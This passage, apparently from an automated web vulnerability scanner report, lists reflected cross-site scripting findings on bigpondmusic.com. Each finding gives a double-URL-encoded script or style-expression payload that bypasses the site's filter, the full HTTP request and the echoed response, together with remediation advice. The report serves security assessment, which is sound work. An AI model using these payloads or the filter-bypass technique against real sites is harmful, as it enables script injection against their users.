<title>Site Index - Sitemap - BigPo
...[SNIP]...
,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'browse';
   s.prop4 = 'albums3996e';4afac108669';
   s.prop5 = 'newrelease';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.p
...[SNIP]...

2.218. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a04e3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e457cc0fd8c6 was submitted in the REST URL parameter 2. This input was echoed as a04e3"><script>alert(1)</script>457cc0fd8c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albumsa04e3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e457cc0fd8c6/NewRelease/Format-Album/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:12:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87985


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albumsa04e3"><script>alert(1)</script>457cc0fd8c6/NewRelease/Format-Album/By-ReleaseDate" />
...[SNIP]...

2.219. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5579%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e579f51bad87 was submitted in the REST URL parameter 3. This input was echoed as e5579"><script>alert(1)</script>579f51bad87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewReleasee5579%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e579f51bad87/Format-Album/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88323


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums/NewReleasee5579"><script>alert(1)</script>579f51bad87/Format-Album/By-ReleaseDate" />
...[SNIP]...

2.220. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 707ba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712973b72ab2 was submitted in the REST URL parameter 3. This input was echoed as 707ba'style='x:expression(alert(1))'12973b72ab2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease707ba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712973b72ab2/Format-Album/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88457


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/browse/Albums/NewRelease707ba'style='x:expression(alert(1))'12973b72ab2/Format-Album/By-ReleaseDate' />
...[SNIP]...

2.221. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53e59'%3bf3ee490db89 was submitted in the REST URL parameter 3. This input was echoed as 53e59';f3ee490db89 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/Albums/NewRelease53e59'%3bf3ee490db89/Format-Album/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88106


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
globalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'browse';
   s.prop4 = 'albums';
   s.prop5 = 'newrelease53e59';f3ee490db89';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 + '|' + s.prop5;
   s.
...[SNIP]...

2.222. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2cf15%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dd646e40ee3 was submitted in the REST URL parameter 4. This input was echoed as 2cf15'style='x:expression(alert(1))'dd646e40ee3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease/Format-Album2cf15%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dd646e40ee3/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album2cf15'style='x:expression(alert(1))'dd646e40ee3/By-ReleaseDate' />
...[SNIP]...

2.223. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d078c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72a36c9a5ae was submitted in the REST URL parameter 4. This input was echoed as d078c"><script>alert(1)</script>72a36c9a5ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease/Format-Albumd078c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72a36c9a5ae/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums/NewRelease/Format-Albumd078c"><script>alert(1)</script>72a36c9a5ae/By-ReleaseDate" />
...[SNIP]...

2.224. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d896%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61bbc99c0ef was submitted in the REST URL parameter 5. This input was echoed as 7d896"><script>alert(1)</script>61bbc99c0ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate7d896%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61bbc99c0ef HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:13:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88428


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate7d896"><script>alert(1)</script>61bbc99c0ef" />
...[SNIP]...

2.225. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 74d3c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252702be3f93632 was submitted in the REST URL parameter 5. This input was echoed as 74d3c'style='x:expression(alert(1))'02be3f93632 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate74d3c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252702be3f93632 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:13:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88814


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate74d3c'style='x:expression(alert(1))'02be3f93632' />
...[SNIP]...

2.226. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14be1"style%3d"x%3aexpression(alert(1))"da4331ef2ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14be1"style="x:expression(alert(1))"da4331ef2ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate?14be1"style%3d"x%3aexpression(alert(1))"da4331ef2ee=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:11:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 182480


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>New Release Albums - BigPond
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate?14be1"style="x:expression(alert(1))"da4331ef2ee=1" />
...[SNIP]...

2.227. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81b08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01ff1a3c713 was submitted in the REST URL parameter 1. This input was echoed as 81b08"><script>alert(1)</script>01ff1a3c713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse81b08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01ff1a3c713/Albums/NewRelease/Format-Album/By-ReleaseDate/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88045


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse81b08"><script>alert(1)</script>01ff1a3c713/Albums/NewRelease/Format-Album/By-ReleaseDate/" />
...[SNIP]...

2.228. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a517c'%3bc57e20244a3 was submitted in the REST URL parameter 1. This input was echoed as a517c';c57e20244a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browsea517c'%3bc57e20244a3/Albums/NewRelease/Format-Album/By-ReleaseDate/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87953


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
rabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'browsea517c';c57e20244a3';
   s.prop4 = 'albums';
   s.prop5 = 'newrelease';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' +
...[SNIP]...

2.229. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Album/By-ReleaseDate/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/

Issue detail

